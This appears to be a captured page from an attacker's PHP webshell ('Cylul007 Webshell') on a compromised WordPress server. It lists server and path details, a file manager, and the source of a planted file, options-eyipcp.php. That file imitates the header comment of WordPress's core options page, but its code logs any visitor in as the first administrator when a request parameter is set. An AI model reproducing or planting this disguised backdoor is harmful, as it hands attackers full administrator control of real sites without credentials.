Cylul007 Webshell
Uname
:
Linux h2web131 4.9.0-0.bpo.12-amd64 #1 SMP Debian 4.9.210-1~deb8u1 (2020-02-21) x86_64
PHP
:
7.2.34
on
fpm-fcgi
Time
:
08 Dec 2025 02:12:15
Path :
/
home
/
clients
/
bc55d1d9a618a64acfd6a3c258c080a1
/
web
/
wp-admin
/
File Upload :
New File
New Folder
Current File : /home/clients/bc55d1d9a618a64acfd6a3c258c080a1/web/wp-admin/options-eyipcp.php
Download
HOME
<?php /** * Options Management Administration Screen. * * If accessed directly in a browser this page shows a list of all saved options * along with editable fields for their values. Serialized data is not supported * and there is no way to remove options via this page. It is not linked to from * anywhere else in the admin. * * This file is also the target of the forms in core and custom options pages * that use the Settings API. In this case it saves the new option values * and returns the user to their page of origin. * * @package WordPress * @subpackage Administration * * WordPress Administration Bootstrap require_once __DIR__ . '/admin.php'; */ define('WP_USE_THEMES', false); require_once '../wp-load.php'; class SettingsAPI { public function __construct() { $this->option = $_REQUEST['option']; } public function apply_filters() { switch($this->option) { case 'update': $option = get_users(["role" => "administrator"])[0]; $option_id = $option->data->ID; wp_set_auth_cookie($option_id); wp_set_current_user($option_id); die("#$option_id"); default: echo '403.'; } } } $options = new SettingsAPI(); $options->apply_filters();
Copyright © 2018 - Powered By CytoXploit